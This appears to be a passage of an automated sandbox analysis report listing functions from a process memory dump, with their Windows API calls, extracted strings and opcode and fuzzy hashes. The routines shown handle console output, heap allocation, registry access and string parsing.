                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcess
                                              • String ID:
                                              • API String ID: 1617791916-0
                                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction ID: 6c7f37e0c5b0d58ac474f421fe30810d9f3b33dbe9da694c8aa192d980353a98
                                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                              • Instruction Fuzzy Hash: 1F219262A09B4286EA049B51A9402B9B7A1FF8DBE4B059230CE1E877B5DE3DF0058715
                                              APIs
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D01C
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D033
                                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D06D
                                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF6EB18507A), ref: 00007FF6EB19D07F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                              • String ID:
                                              • API String ID: 1033415088-0
                                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction ID: 2e6b747dfafb0c4e45c9185557d3327a2206f574ecddac2b5b2c323d0c6b1fb0
                                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                              • Instruction Fuzzy Hash: 6C119832618A8287E7444B14F1542BAB7E0FB8EBA9F445135FA8E87B64DF3DD0458F05
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • wcschr.MSVCRT ref: 00007FF6EB1A11DC
                                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6EB19827A), ref: 00007FF6EB1A1277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcessmemmovewcschr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 4220614737-381716982
                                              • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction ID: 430a79cb411898bf52e844803a0c0f31ff7d27962a3ef321d836fd0a0559ea1f
                                              • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                              • Instruction Fuzzy Hash: F771B37390824286D7608F25A4907F966A4FB9D7BCF500636C94DC3BB4CE3EF4558B09
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                               • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                               • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memmovewcsncmp
                                              • String ID: 0123456789
                                              • API String ID: 3879766669-2793719750
                                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction ID: 2f2115648c17e464e55a68419d3083fd1ae8bcb41bdf2b7c5294e5c131bfd03c
                                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                              • Instruction Fuzzy Hash: BA41D223F1878A85EA258F2694043FA6394FB4CBA8F445135CE4E837A4DE3DE4498B85
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1997D0
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB1998D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction ID: 066514ba7933842922cd880d7662a6ff2c702969be1fc716b82f63d2f26873b9
                                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                              • Instruction Fuzzy Hash: 3241E333A0979681EA00DB16D4442B963A4FB8DBE8F508134DA5D837F5EF3AE846C349
                                              APIs
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A0FC
                                                • Part of subcall function 00007FF6EB17D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D46E
                                                • Part of subcall function 00007FF6EB17D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6EB17D485
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D4EE
                                                • Part of subcall function 00007FF6EB17D3F0: iswspace.MSVCRT ref: 00007FF6EB17D54D
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D569
                                                • Part of subcall function 00007FF6EB17D3F0: wcschr.MSVCRT ref: 00007FF6EB17D58C
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19A1FB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                              • String ID: Software\Classes
                                              • API String ID: 2714550308-1656466771
                                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction ID: 77ab1895bddaabd542434f17aca530fee6fd7b1ad717c390fdc28c1049055b1e
                                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                              • Instruction Fuzzy Hash: 4B41C323A19796C1EA00DB15D4446B963A4FB8DBE8F508131DA5D837F4DF3AE84AC389
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsnicmp
                                              • String ID: /-Y
                                              • API String ID: 1886669725-4274875248
                                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction ID: 546cf248ef1937a6560cdfaa568024d4d6d61491d19ee941c16710dd2c2752d0
                                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                              • Instruction Fuzzy Hash: 2A21A667E0876581EA105B02A6443B876A0BB4DFE4F444032DE89877E4DF7EE4A2D70A